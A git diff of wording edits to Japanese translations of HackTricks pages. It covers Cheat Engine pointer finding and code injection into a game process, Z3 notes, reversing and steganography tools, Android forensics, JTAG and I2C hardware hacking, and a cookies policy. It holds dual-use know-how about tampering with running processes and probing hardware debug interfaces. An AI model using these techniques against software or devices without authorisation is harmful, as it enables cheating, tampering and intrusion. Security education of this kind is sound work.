+これまで、値を保存しているアドレスを見つける方法を学びましたが、**ゲームの異なる実行でそのアドレスがメモリの異なる場所にある可能性が高い**です。では、そのアドレスを常に見つける方法を見てみましょう。
 
-前述のトリックのいくつかを使用して、現在のゲームが重要な値を保存しているアドレスを見つけます。次に（ゲームを停止しても構いません）、見つけた**アドレス**を右クリックし、**「このアドレスにアクセスするものを見つける」**または**「このアドレスに書き込むものを見つける」**を選択します：
+前述のトリックのいくつかを使用して、現在のゲームが重要な値を保存しているアドレスを見つけます。その後（ゲームを停止しても構いません）、見つけた**アドレス**を右クリックし、**「このアドレスにアクセスするものを見つける」**または**「このアドレスに書き込むものを見つける」**を選択します：
 
 ![](<../../images/image (1067).png>)
 
-**最初のオプション**は、この**アドレス**を**使用している**コードの**部分**を知るのに役立ちます（これは、ゲームのコードを**変更できる場所を知る**のに役立ちます）。\
-**2番目のオプション**はより**具体的**で、**この値がどこから書き込まれているか**を知るのに役立ちます。
+**最初のオプション**は、この**アドレス**を**使用しているコードの**どの**部分**があるかを知るのに役立ちます（これは、ゲームのコードを変更できる場所を知るのに役立ちます）。\
+**2番目のオプション**はより**具体的**で、**この値がどこから書き込まれているかを知ることに興味があるため、こちらの方が役立ちます**。
 
-これらのオプションのいずれかを選択すると、**デバッガ**がプログラムに**接続**され、新しい**空のウィンドウ**が表示されます。今、**ゲームをプレイ**して、その**値を変更**します（ゲームを再起動せずに）。**ウィンドウ**は、**値を変更しているアドレス**で**埋まる**はずです：
+これらのオプションのいずれかを選択すると、**デバッガ**がプログラムに**接続**され、新しい**空のウィンドウ**が表示されます。今、**ゲームをプレイ**してその**値を変更**します（ゲームを再起動せずに）。**ウィンドウ**は、**値を変更しているアドレス**で**埋まる**はずです：
 
 ![](<../../images/image (91).png>)
 
@@ -102,7 +102,7 @@ Cheat Engineは、**100から新しい値に変わった**値を検索します
 
 ### ランダムメモリアドレス - ポインタの発見
 
-前のステップに従って、興味のある値がどこにあるかを見つけます。次に、**「このアドレスに書き込むものを見つける」**を使用して、この値を書き込むアドレスを見つけ、ダブルクリックしてディスアセンブリビューを取得します：
+前のステップに従って、興味のある値がどこにあるかを見つけます。その後、**「このアドレスに書き込むものを見つける」**を使用して、この値を書き込むアドレスを見つけ、ダブルクリックしてディスアセンブリビューを取得します：
 
 ![](<../../images/image (1039).png>)
 
@@ -110,14 +110,14 @@ Cheat Engineは、**100から新しい値に変わった**値を検索します
 
 ![](<../../images/image (994).png>)
 
-（いくつかが表示される場合は、通常、最小のアドレスのものが必要です）\
+（複数の値が表示される場合は、通常、最小のアドレスのものが必要です）\
 これで、**興味のある値を変更するポインタを見つけました**。
 
 **「アドレスを手動で追加」**をクリックします：
 
 ![](<../../images/image (990).png>)
 
-次に、**ポインタ**のチェックボックスをクリックし、テキストボックスに見つけたアドレスを追加します（このシナリオでは、前の画像で見つけたアドレスは「Tutorial-i386.exe」+2426B0でした）：
+次に、**ポインタ**チェックボックスをクリックし、テキストボックスに見つけたアドレスを追加します（このシナリオでは、前の画像で見つけたアドレスは「Tutorial-i386.exe」+2426B0でした）：
 
 ![](<../../images/image (392).png>)
 
@@ -131,14 +131,14 @@ OKをクリックすると、新しいポインタが作成されます：
 
 ### コードインジェクション
 
-コードインジェクションは、ターゲットプロセスにコードの一部を注入し、その後、コードの実行を自分が書いたコードを通過させる技術です（たとえば、ポイントを減らす代わりに与えるなど）。
+コードインジェクションは、ターゲットプロセスにコードの一部を注入し、その後、コードの実行を自分が書いたコードを通過させる技術です（たとえば、ポイントを減らすのではなく与えるなど）。
 
 したがって、プレイヤーのライフから1を引いているアドレスを見つけたと想像してください：
 
 ![](<../../images/image (203).png>)
 
 **ディスアセンブラを表示**をクリックして、**ディスアセンブルコード**を取得します。\
-次に、**CTRL+a**をクリックしてオートアセンブルウィンドウを呼び出し、_**Template --> Code Injection**_を選択します。
+次に、**CTRL+a**をクリックしてオートアセンブルウィンドウを呼び出し、_**Template --> Code Injection**_ を選択します。
 
 ![](<../../images/image (902).png>)
 
@@ -150,7 +150,7 @@ OKをクリックすると、新しいポインタが作成されます：
 
 ![](<../../images/image (944).png>)
 
-したがって、**newmem**セクションに新しいアセンブリコードを挿入し、**originalcode**から元のコードを削除します（実行したくない場合）。この例では、注入されたコードは1を引く代わりに2ポイントを追加します：
+したがって、**newmem**セクションに新しいアセンブリコードを挿入し、**originalcode**から元のコードを削除します（実行したくない場合）。この例では、注入されたコードは1を引くのではなく2ポイントを加算します：
 
 ![](<../../images/image (521).png>)
 
diff --git a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
index 46ac4f461..cbc5d80e5 100644
--- a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
+++ b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
@@ -55,9 +55,9 @@ print ("x = %s" % m[x])
 for d in m.decls():
 print("%s = %s" % (d.name(), m[d]))
 ```
-# 機械算術
+# マシン算術
 
-現代のCPUと主流のプログラミング言語は、**固定サイズのビットベクター**に対する算術を使用します。機械算術はZ3Pyで**ビットベクター**として利用可能です。
+現代のCPUと主流のプログラミング言語は、**固定サイズのビットベクター**に対する算術を使用します。マシン算術はZ3Pyで**ビットベクター**として利用可能です。
 ```python
 from z3 import *
 
@@ -74,7 +74,7 @@ print(simplify(a == b)) #This is False
 ```
 ## 符号付き/符号なしの数
 
-Z3は、**ビットベクターが符号付きまたは符号なしとして扱われるかどうか**が重要な算術演算の特別な符号付きバージョンを提供します。Z3Pyでは、演算子**<, <=, >, >=, /, % および >>**は**符号付き**バージョンに対応しています。対応する**符号なし**演算子は**ULT, ULE, UGT, UGE, UDiv, URem および LShR**です。
+Z3は、**ビットベクターが符号付きまたは符号なしとして扱われるかどうか**が重要な場合に、特別な符号付きの算術演算を提供します。Z3Pyでは、演算子**<, <=, >, >=, /, % および >>**は**符号付き**バージョンに対応しています。対応する**符号なし**演算子は**ULT, ULE, UGT, UGE, UDiv, URem および LShR.**です。
 ```python
 from z3 import *
 
@@ -94,7 +94,7 @@ solve(ULT(x, 0))
 ```
 ## 関数
 
-**解釈された関数**は、**関数 +**が**固定された標準的な解釈**を持つ算術のようなもので（2つの数を加算します）。**解釈されていない関数**と定数は**最大限に柔軟**です；それらは関数や定数に対する**制約**と**一貫性**のある**任意の解釈**を許可します。
+**解釈された関数**は、**関数 +**が**固定された標準解釈**を持つ算術のようなもので（2つの数を加算します）、**解釈されていない関数**と定数は**最大限の柔軟性**を持ちます。これらは、関数や定数に対する**制約**と**一貫性**のある**任意の解釈**を許可します。
 
 例：fをxに2回適用すると再びxになりますが、fをxに1回適用するとxとは異なります。
 ```python
diff --git a/src/reversing/reversing-tools/README.md b/src/reversing/reversing-tools/README.md
index 6595472cc..0e38927a5 100644
--- a/src/reversing/reversing-tools/README.md
+++ b/src/reversing/reversing-tools/README.md
@@ -17,7 +17,7 @@
 
 # .Net デコンパイルリソース
 
-.Net アセンブリのデコンパイルは、以下のツールを使用して行うことができます：
+.Net アセンブリのデコンパイルは、以下のツールを使用して実行できます：
 
 - [ILSpy](https://github.com/icsharpcode/ILSpy) は、[Visual Studio Code 用のプラグイン](https://github.com/icsharpcode/ilspy-vscode) も提供しており、クロスプラットフォームでの使用が可能です。
 - **デコンパイル**、**修正**、および **再コンパイル** に関する作業には、[dnSpy](https://github.com/0xd4d/dnSpy/releases) が強く推奨されます。メソッドを **右クリック** し、**Modify Method** を選択することでコードの変更が可能です。
@@ -62,7 +62,7 @@ Java バイトコードをデコンパイルするために、これらのツー
 
 ### x64dbg/x32dbg を使用
 
-- IDA と同様に、**rundll32** はコマンドラインの変更を加えて DLL と関数を指定してロードされます。
+- IDA と同様に、**rundll32** はコマンドラインの修正を加えて DLL と関数を指定してロードされます。
 - DLL エントリでブレークするように設定が調整され、希望する DLL エントリポイントでブレークポイントを設定できます。
 
 ### 画像
@@ -84,7 +84,7 @@ Java バイトコードをデコンパイルするために、これらのツー
 
 ### デオブフスケーションと分析
 
-- **scdbg** は、シェルコードの機能とデオブフスケーション機能に関する洞察を提供します。
+- **scdbg** は、シェルコード関数とデオブフスケーション機能に関する洞察を提供します。
 %%%bash
 scdbg.exe -f shellcode # 基本情報
 scdbg.exe -f shellcode -r # 分析レポート
diff --git a/src/reversing/word-macros.md b/src/reversing/word-macros.md
index 5eabff388..4078b7c3f 100644
--- a/src/reversing/word-macros.md
+++ b/src/reversing/word-macros.md
@@ -4,14 +4,14 @@
 
 ### Junk Code
 
-**使用されないジャンクコード**を見つけることは非常に一般的で、マクロのリバースを難しくします。\
+**使用されないジャンクコード**を見つけることは非常に一般的で、マクロのリバースをより困難にします。\
 例えば、次の画像では、決して真にならないIfがいくつかのジャンクで無駄なコードを実行するために使用されています。
 
 ![](<../images/image (369).png>)
 
 ### Macro Forms
 
-**GetObject**関数を使用すると、マクロのフォームからデータを取得することが可能です。これは分析を難しくするために使用できます。以下は、**テキストボックス内にデータを隠すために使用されるマクロフォーム**の写真です（テキストボックスは他のテキストボックスを隠すことができます）：
+**GetObject**関数を使用すると、マクロのフォームからデータを取得することが可能です。これは分析を困難にするために使用できます。以下は、**テキストボックス内にデータを隠すために使用されるマクロフォーム**の写真です（テキストボックスは他のテキストボックスを隠すことができます）：
 
 ![](<../images/image (344).png>)
 
diff --git a/src/stego/esoteric-languages.md b/src/stego/esoteric-languages.md
index e4399b80d..936c31069 100644
--- a/src/stego/esoteric-languages.md
+++ b/src/stego/esoteric-languages.md
@@ -4,7 +4,7 @@
 
 ## [Esolangs Wiki](https://esolangs.org/wiki/Main_Page)
 
-そのウィキをチェックして、より多くのエソテリック言語を検索してください。
+そのウィキをチェックして、より多くのエソテリック言語を探してください。
 
 ## Malbolge
 ```
diff --git a/src/stego/stego-tricks.md b/src/stego/stego-tricks.md
index da664d466..bebc49930 100644
--- a/src/stego/stego-tricks.md
+++ b/src/stego/stego-tricks.md
@@ -20,7 +20,7 @@ foremost -i file # Extracts data
 ```
 ### **Exiftool**
 
-ファイルメタデータを表示するのに役立ちます。利用可能なリンクは[こちら](https://www.sno.phy.queensu.ca/~phil/exiftool/)。
+ファイルメタデータを表示するのに役立ちます。利用可能なリンクは[こちら](https://www.sno.phy.queensu.ca/~phil/exiftool/)です。
 ```bash
 exiftool file # Shows the metadata
 ```
@@ -54,17 +54,17 @@ strings -e B -n 6 file # 32bit strings (big-endian)
 ```bash
 cmp original.jpg stego.jpg -b -l
 ```
-## **テキスト内の隠れたデータの抽出**
+## **テキスト内の隠されたデータの抽出**
 
-### **スペース内の隠れたデータ**
+### **スペース内の隠されたデータ**
 
 見た目には空のスペースに隠された情報があるかもしれません。このデータを抽出するには、[https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)を訪れてください。
 
-## **画像からのデータ抽出**
+## **画像からのデータの抽出**
 
-### **GraphicMagickを使用した画像詳細の特定**
+### **GraphicMagickを使用した画像の詳細の特定**
 
-[GraphicMagick](https://imagemagick.org/script/download.php)は、画像ファイルの種類を特定し、潜在的な破損を識別するために使用されます。以下のコマンドを実行して画像を検査します：
+[GraphicMagick](https://imagemagick.org/script/download.php)は、画像ファイルの種類を特定し、潜在的な破損を識別するために使用されます。画像を検査するには、以下のコマンドを実行してください：
 ```bash
 ./magick identify -verbose stego.jpg
 ```
@@ -72,9 +72,9 @@ cmp original.jpg stego.jpg -b -l
 ```bash
 ./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg
 ```
-### **Steghideによるデータ隠蔽**
+### **データ隠蔽のためのSteghide**
 
-Steghideは、`JPEG, BMP, WAV, AU`ファイル内にデータを隠すことを可能にし、暗号化されたデータの埋め込みと抽出ができます。インストールは`apt`を使用して簡単に行え、[ソースコードはGitHubで入手可能です](https://github.com/StefanoDeVuono/steghide)。
+Steghideは、`JPEG, BMP, WAV, AU`ファイル内にデータを隠すことを容易にし、暗号化されたデータの埋め込みと抽出が可能です。インストールは`apt`を使用して簡単に行え、[ソースコードはGitHubで入手可能です](https://github.com/StefanoDeVuono/steghide)。
 
 **コマンド:**
 
@@ -114,11 +114,11 @@ zstegはPNGおよびBMPファイル内の隠れたデータを発見すること
 
 ### **Stegpy for Audio and Image Files**
 
-Stegpyは画像および音声ファイルに情報を埋め込むことを可能にし、PNG、BMP、GIF、WebP、WAVなどのフォーマットをサポートしています。これは[GitHub](https://github.com/dhsdshdhk/stegpy)で入手可能です。
+Stegpyは、PNG、BMP、GIF、WebP、WAVなどの形式をサポートし、画像および音声ファイルに情報を埋め込むことを可能にします。これは[GitHub](https://github.com/dhsdshdhk/stegpy)で入手可能です。
 
 ### **Pngcheck for PNG File Analysis**
 
-PNGファイルを分析したり、その真正性を検証するには、次のコマンドを使用します：
+PNGファイルを分析するか、その真正性を検証するには、次のコマンドを使用します：
 ```bash
 apt-get install pngcheck
 pngcheck stego.png
@@ -135,15 +135,15 @@ pngcheck stego.png
 
 ## **オーディオからのデータ抽出**
 
-**オーディオステガノグラフィ**は、音声ファイル内に情報を隠す独自の方法を提供します。隠されたコンテンツを埋め込むまたは取得するために、さまざまなツールが利用されます。
+**オーディオステガノグラフィ**は、音声ファイル内に情報を隠すユニークな方法を提供します。隠されたコンテンツを埋め込むまたは取得するために、さまざまなツールが利用されます。
 
 ### **Steghide (JPEG, BMP, WAV, AU)**
 
-Steghideは、JPEG、BMP、WAV、およびAUファイルにデータを隠すために設計された多目的ツールです。詳細な手順は[stego tricks documentation](stego-tricks.md#steghide)に記載されています。
+Steghideは、JPEG、BMP、WAV、およびAUファイルにデータを隠すために設計された多目的ツールです。詳細な指示は[stego tricks documentation](stego-tricks.md#steghide)に記載されています。
 
 ### **Stegpy (PNG, BMP, GIF, WebP, WAV)**
 
-このツールは、PNG、BMP、GIF、WebP、およびWAVを含むさまざまなフォーマットに対応しています。詳細については[Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav)を参照してください。
+このツールは、PNG、BMP、GIF、WebP、およびWAVを含むさまざまなフォーマットに対応しています。詳細については、[Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav)を参照してください。
 
 ### **ffmpeg**
 
@@ -153,7 +153,7 @@ ffmpeg -v info -i stego.mp3 -f null -
 ```
 ### **WavSteg (WAV)**
 
-WavStegは、最下位ビット戦略を使用してWAVファイル内にデータを隠蔽および抽出するのに優れています。これは[GitHub](https://github.com/ragibson/Steganography#WavSteg)で入手可能です。コマンドには次が含まれます:
+WavStegは、最下位ビット戦略を使用してWAVファイル内にデータを隠蔽および抽出するのに優れています。これは[GitHub](https://github.com/ragibson/Steganography#WavSteg)で入手可能です。コマンドには次のものが含まれます:
 ```bash
 python3 WavSteg.py -r -b 1 -s soundfile -o outputfile
 
@@ -167,13 +167,13 @@ Deepsoundは、AES-256を使用して音声ファイル内の情報を暗号化
 
 音声ファイルの視覚的および分析的検査において非常に貴重なツールであるSonic Visualizerは、他の手段では検出できない隠れた要素を明らかにすることができます。 詳細は[公式ウェブサイト](https://www.sonicvisualiser.org/)をご覧ください。
 
-### **DTMFトーン - ダイヤルトーン**
+### **DTMF Tones - Dial Tones**
 
 音声ファイル内のDTMFトーンを検出するには、[このDTMF検出器](https://unframework.github.io/dtmf-detect/)や[DialABC](http://dialabc.com/sound/detect/index.html)などのオンラインツールを使用できます。
 
-## **その他の技術**
+## **Other Techniques**
 
-### **バイナリ長SQRT - QRコード**
+### **Binary Length SQRT - QR Code**
 
 整数に平方するバイナリデータはQRコードを表す可能性があります。このスニペットを使用して確認してください：
 ```python
diff --git a/src/todo/android-forensics.md b/src/todo/android-forensics.md
index a0e30f747..4c54ecb4f 100644
--- a/src/todo/android-forensics.md
+++ b/src/todo/android-forensics.md
@@ -12,7 +12,7 @@ Androidデバイスからデータを抽出するには、デバイスがロッ
 
 ## データ取得
 
-[adbを使用してandroidバックアップを作成](../mobile-pentesting/android-app-pentesting/adb-commands.md#backup)し、[Android Backup Extractor](https://sourceforge.net/projects/adbextractor/)を使用して抽出します：`java -jar abe.jar unpack file.backup file.tar`
+[adbを使用してandroidバックアップを作成](../mobile-pentesting/android-app-pentesting/adb-commands.md#backup)し、[Android Backup Extractor](https://sourceforge.net/projects/adbextractor/)を使用して抽出します： `java -jar abe.jar unpack file.backup file.tar`
 
 ### ルートアクセスまたはJTAGインターフェースへの物理接続がある場合
 
diff --git a/src/todo/cookies-policy.md b/src/todo/cookies-policy.md
index 92a057f85..e8d0df133 100644
--- a/src/todo/cookies-policy.md
+++ b/src/todo/cookies-policy.md
@@ -1,45 +1,45 @@
-# クッキーポリシー
+# Cookies Policy
 
 最終更新日: 2023年4月2日
 
-### はじめに
+### Introduction
 
-このクッキーポリシーは、HackTricksチーム（「HackTricks」、「私たち」、「私たちの」）が所有および運営する以下のウェブサイトに適用されます：
+このCookiesポリシーは、HackTricksチーム（「HackTricks」、「私たち」、「私たちの」）が所有および運営する以下のウェブサイトに適用されます：
 
 * hacktricks.xyz
 * [www.hacktricks.xyz](http://www.hacktricks.xyz/)
 * book.hacktricks.xyz
 * cloud.hacktricks.xyz
 
-これらのウェブサイトのいずれかを使用することにより、あなたはこのクッキーポリシーに従ってクッキーの使用に同意するものとします。同意しない場合は、ブラウザの設定でクッキーを無効にするか、私たちのウェブサイトの使用を控えてください。
+これらのウェブサイトのいずれかを使用することにより、あなたはこのCookiesポリシーに従ってクッキーの使用に同意したことになります。同意しない場合は、ブラウザの設定でクッキーを無効にするか、私たちのウェブサイトの使用を控えてください。
 
-### クッキーとは？
+### What are cookies?
 
 クッキーは、ウェブサイトを訪問したときにコンピュータやモバイルデバイスに保存される小さなテキストファイルです。これらは、ウェブサイトを機能させ、機能性を向上させ、よりパーソナライズされたユーザー体験を提供するために広く使用されています。
 
-### クッキーの使用方法
+### How we use cookies
 
-私たちは、以下の目的でウェブサイトでクッキーを使用します：
+私たちは、以下の目的でウェブサイトでクッキーを使用しています：
 
-1. 必要不可欠なクッキー：これらのクッキーは、ユーザー認証の有効化、セキュリティの維持、あなたの設定の記憶など、私たちのウェブサイトの基本的な機能に必要です。
+1. 必須クッキー：これらのクッキーは、ユーザー認証の有効化、セキュリティの維持、あなたの設定の記憶など、私たちのウェブサイトの基本的な機能に必要です。
 2. パフォーマンスクッキー：これらのクッキーは、訪問者が私たちのウェブサイトとどのように相互作用しているかを理解するのに役立ち、情報を匿名で収集および報告します。これにより、ウェブサイトのパフォーマンスとユーザー体験を向上させることができます。
-3. 機能性クッキー：これらのクッキーは、あなたが選択した言語や地域などの選択肢を記憶し、よりパーソナライズされた体験を提供することを可能にします。
-4. ターゲティング/広告クッキー：これらのクッキーは、あなたの興味、閲覧履歴、および私たちのウェブサイトとの相互作用に基づいて、関連する広告やマーケティングコミュニケーションを提供するために使用されます。
+3. 機能性クッキー：これらのクッキーは、言語や地域など、あなたが行った選択をウェブサイトが記憶できるようにし、よりパーソナライズされた体験を提供します。
+4. ターゲティング/広告クッキー：これらのクッキーは、あなたの興味、閲覧履歴、私たちのウェブサイトとの相互作用に基づいて、関連する広告やマーケティングコミュニケーションを提供するために使用されます。
 
-さらに、book.hacktricks.xyzおよびcloud.hacktricks.xyzのページはGitbookにホストされています。Gitbookのクッキーに関する詳細情報は、[https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy)で確認できます。
+さらに、book.hacktricks.xyzおよびcloud.hacktricks.xyzのページはGitbookでホストされています。Gitbookのクッキーに関する詳細情報は、[https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy)で確認できます。
 
-### サードパーティのクッキー
+### Third-party cookies
 
 私たち自身のクッキーに加えて、ウェブサイトの使用統計を報告し、広告を配信し、ソーシャルメディア共有ボタンを有効にするために、サードパーティのクッキーを使用することもあります。サードパーティのクッキーの使用は、それぞれのプライバシーポリシーに従います。
 
-クッキーの管理
+Managing cookies
 
 ほとんどのウェブブラウザでは、設定を通じてクッキーを管理できます。デバイス上でクッキーの使用をブロック、削除、または制限することを選択できます。ただし、クッキーを無効にすると、私たちのウェブサイトの機能性やパフォーマンスに影響を与える可能性があることに注意してください。
 
-このクッキーポリシーの変更
+Changes to this Cookies Policy
 
-私たちは、実践や関連法の変更を反映するために、このクッキーポリシーを随時更新することがあります。最新のクッキーの使用に関する情報を得るために、定期的にこのページを確認することをお勧めします。
+私たちは、実践や関連法の変更を反映するために、このCookiesポリシーを随時更新することがあります。最新のクッキーの実践に関する情報を定期的に確認することをお勧めします。
 
-### お問い合わせ
+### Contact us
 
-このクッキーポリシーについて質問や懸念がある場合は、[support@hacktricks.xyz](mailto:support@hacktricks.xyz)までご連絡ください。
+このCookiesポリシーに関して質問や懸念がある場合は、[support@hacktricks.xyz](mailto:support@hacktricks.xyz)までご連絡ください。
diff --git a/src/todo/hardware-hacking/README.md b/src/todo/hardware-hacking/README.md
index 710458b5b..c016b1abc 100644
--- a/src/todo/hardware-hacking/README.md
+++ b/src/todo/hardware-hacking/README.md
@@ -27,7 +27,7 @@ JTAGulatorのようなツールを使用すると、これらの命令に出く
 - テストモード選択（**TMS**）入力 TMSは**有限状態機械**を制御します。クロックの各ビートで、デバイスのJTAG TAPコントローラーはTMSピンの電圧をチェックします。電圧が特定の閾値を下回ると、信号は低と見なされ0として解釈され、電圧が特定の閾値を上回ると、信号は高と見なされ1として解釈されます。
 - テストデータ入力（**TDI**） TDIは、**スキャンセルを通じてチップにデータを送信する**ピンです。JTAGはこのピンを介した通信プロトコルを定義していないため、各ベンダーがこのプロトコルを定義する責任があります。
 - テストデータ出力（**TDO**） TDOは、**チップからデータを送信する**ピンです。
-- テストリセット（**TRST**）入力 オプションのTRSTは、有限状態機械を**既知の良好な状態にリセット**します。代わりに、TMSが5回連続して1に保持されると、TRSTピンと同様にリセットが呼び出されるため、TRSTはオプションです。
+- テストリセット（**TRST**）入力 オプションのTRSTは、有限状態機械を**既知の良好な状態**にリセットします。代わりに、TMSが5回連続して1に保持されると、TRSTピンと同様にリセットが呼び出されるため、TRSTはオプションです。
 
 時には、PCBにマークされたこれらのピンを見つけることができるでしょう。他の場合には、**それらを見つける**必要があるかもしれません。
 
@@ -35,11 +35,11 @@ JTAGulatorのようなツールを使用すると、これらの命令に出く
 
 JTAGポートを検出する最も速いが最も高価な方法は、**JTAGulator**を使用することです。このデバイスはこの目的のために特別に作成されました（ただし、**UARTピンアウトも検出できます**）。
 
-それは、ボードのピンに接続できる**24チャンネル**を持っています。次に、すべての可能な組み合わせの**BF攻撃**を実行し、**IDCODE**および**BYPASS**境界スキャンコマンドを送信します。応答を受け取ると、各JTAG信号に対応するチャンネルを表示します。
+それは、ボードのピンに接続できる**24チャンネル**を持っています。次に、すべての可能な組み合わせの**IDCODE**および**BYPASS**境界スキャンコマンドを送信する**BF攻撃**を実行します。応答を受け取ると、各JTAG信号に対応するチャンネルを表示します。
 
 より安価ですが、はるかに遅いJTAGピンアウトを特定する方法は、Arduino互換のマイクロコントローラーにロードされた[**JTAGenum**](https://github.com/cyphunk/JTAGenum/)を使用することです。
 
-**JTAGenum**を使用する場合、最初に列挙に使用するプロービングデバイスのピンを**定義**します。デバイスのピンアウト図を参照し、これらのピンをターゲットデバイスのテストポイントに接続する必要があります。
+**JTAGenum**を使用する場合、最初に列挙に使用するプロービングデバイスのピンを**定義**する必要があります。デバイスのピンアウト図を参照し、これらのピンをターゲットデバイスのテストポイントに接続する必要があります。
 
 JTAGピンを特定する**第三の方法**は、**PCBを検査**してピンアウトの1つを探すことです。場合によっては、PCBが便利に**Tag-Connectインターフェース**を提供していることがあり、これはボードにJTAGコネクタがある明確な指標です。そのインターフェースがどのように見えるかは[https://www.tag-connect.com/info/](https://www.tag-connect.com/info/)で確認できます。さらに、PCB上のチップセットの**データシートを検査**することで、JTAGインターフェースを指し示すピンアウト図が明らかになるかもしれません。
 
diff --git a/src/todo/hardware-hacking/fault_injection_attacks.md b/src/todo/hardware-hacking/fault_injection_attacks.md
index 8d9dcfae8..07ed520f0 100644
--- a/src/todo/hardware-hacking/fault_injection_attacks.md
+++ b/src/todo/hardware-hacking/fault_injection_attacks.md
@@ -1,5 +1,5 @@
 # フォルトインジェクション攻撃
 
-フォルトインジェクション攻撃は、電子回路に外部の干渉を導入してその動作に影響を与え、情報を開示したり、回路内の特定の制限を回避したりすることを含みます。この攻撃は、電子回路に対する攻撃の多くの可能性を開きます。この攻撃は、電子回路のグリッチングとも呼ばれます。
+フォルトインジェクション攻撃は、電子回路に外部の干渉を導入してその動作に影響を与え、情報を開示したり、回路内の特定の制限を回避したりすることを含みます。この攻撃は、電子回路を攻撃するための多くの可能性を開きます。この攻撃は、電子回路のグリッチングとも呼ばれます。
 
-電子回路にフォルトを注入するための方法や手段はたくさんあります。
+電子回路にフォルトを注入するための多くの方法と手段があります。
diff --git a/src/todo/hardware-hacking/i2c.md b/src/todo/hardware-hacking/i2c.md
index 868de89e0..6c0e4a236 100644
--- a/src/todo/hardware-hacking/i2c.md
+++ b/src/todo/hardware-hacking/i2c.md
@@ -2,9 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## バスパイレート
+## Bus Pirate
 
-バスパイレートが動作しているかテストするには、+5VをVPUに、3.3VをADCに接続し、バスパイレートにアクセスします（例えばTera Termを使用）し、コマンド`~`を使用します:
+Bus Pirateが動作しているかテストするには、+5VをVPUに、3.3VをADCに接続し、バスパイレートにアクセスします（例えばTera Termを使用）し、コマンド`~`を使用します:
 ```bash
 # Use command
 HiZ>~
@@ -155,7 +155,7 @@ NACK
 ```
 ### Sniffer
 
-このシナリオでは、Arduinoと前のEPROM間のI2C通信をスニッフィングします。両方のデバイスを通信させ、その後バスパイレートをSCL、SDA、およびGNDピンに接続するだけです：
+このシナリオでは、arduinoと前のEPROM間のI2C通信をスニッフィングします。両方のデバイスを通信させ、その後バスパイレートをSCL、SDA、GNDピンに接続するだけです：
 
 ![](<../../images/image (166).png>)
 ```bash
diff --git a/src/todo/hardware-hacking/jtag.md b/src/todo/hardware-hacking/jtag.md
index 9a5f260f5..d144563ca 100644
--- a/src/todo/hardware-hacking/jtag.md
+++ b/src/todo/hardware-hacking/jtag.md
@@ -4,19 +4,19 @@
 
 ## JTAGenum
 
-[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)は、Raspberry PIまたはArduinoを使用して、未知のチップからJTAGピンを見つけるために使用できるツールです。\
-**Arduino**では、**2から11のピンをJTAGに属する可能性のある10ピンに接続**します。プログラムをArduinoにロードすると、すべてのピンをブルートフォースして、JTAGに属するピンがあるかどうか、どのピンがそれに該当するかを確認します。\
-**Raspberry PI**では、**1から6のピンのみを使用**できます（6ピンなので、各潜在的なJTAGピンをテストするのが遅くなります）。
+[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)は、Raspberry PIまたはArduinoを使用して、未知のチップからJTAGピンを探すために使用できるツールです。\
+**Arduino**では、**2から11のピンをJTAGに属する可能性のある10ピンに接続します**。プログラムをArduinoにロードすると、すべてのピンをブルートフォースで試して、どのピンがJTAGに属するかを見つけます。\
+**Raspberry PI**では、**1から6のピンのみを使用できます**（6ピンなので、各潜在的なJTAGピンをテストするのが遅くなります）。
 
 ### Arduino
 
-Arduinoでは、ケーブルを接続した後（ピン2から11をJTAGピンに、Arduino GNDをベースボードGNDに接続）、**ArduinoにJTAGenumプログラムをロード**し、シリアルモニターで**`h`**（ヘルプコマンド）を送信すると、ヘルプが表示されます：
+Arduinoでは、ケーブルを接続した後（ピン2から11をJTAGピンに、Arduino GNDをベースボードGNDに接続）、**JTAGenumプログラムをArduinoにロード**し、シリアルモニターで**`h`**（ヘルプコマンド）を送信すると、ヘルプが表示されます：
 
 ![](<../../images/image (939).png>)
 
 ![](<../../images/image (578).png>)
 
-**「No line ending」と115200baudを設定**します。\
+**「No line ending」と115200baudを設定します**。\
 スキャンを開始するためにコマンドsを送信します：
 
 ![](<../../images/image (774).png>)
diff --git a/src/todo/hardware-hacking/radio.md b/src/todo/hardware-hacking/radio.md
index a643aa707..db372fd40 100644
--- a/src/todo/hardware-hacking/radio.md
+++ b/src/todo/hardware-hacking/radio.md
@@ -1,26 +1,26 @@
-# ラジオ
+# Radio
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## SigDigger
 
-[**SigDigger** ](https://github.com/BatchDrake/SigDigger)は、未知の無線信号の情報を抽出するために設計された、GNU/LinuxおよびmacOS用の無料デジタル信号アナライザーです。SoapySDRを介してさまざまなSDRデバイスをサポートし、FSK、PSK、ASK信号の調整可能な復調、アナログビデオのデコード、バースト信号の分析、アナログ音声チャンネルの聴取（すべてリアルタイムで）を可能にします。
+[**SigDigger** ](https://github.com/BatchDrake/SigDigger)は、未知の無線信号の情報を抽出するために設計された、GNU/LinuxおよびmacOS用の無料デジタル信号アナライザーです。SoapySDRを介してさまざまなSDRデバイスをサポートし、FSK、PSK、ASK信号の調整可能な復調、アナログビデオのデコード、バースト信号の分析、アナログ音声チャンネルのリアルタイムでの聴取を可能にします。
 
-### 基本設定
+### Basic Config
 
-インストール後、設定を考慮するいくつかの項目があります。\
-設定（2番目のタブボタン）では、**SDRデバイス**を選択するか、**ファイルを選択**して読み取り、同調する周波数とサンプルレート（PCがサポートしている場合は最大2.56Mspsを推奨）を設定できます。\\
+インストール後、いくつかの設定を考慮することができます。\
+設定（2番目のタブボタン）で、**SDRデバイス**を選択するか、**ファイルを選択**して読み取り、同調する周波数とサンプルレート（PCがサポートしている場合は最大2.56Mspsを推奨）を設定できます。\\
 
 ![](<../../images/image (245).png>)
 
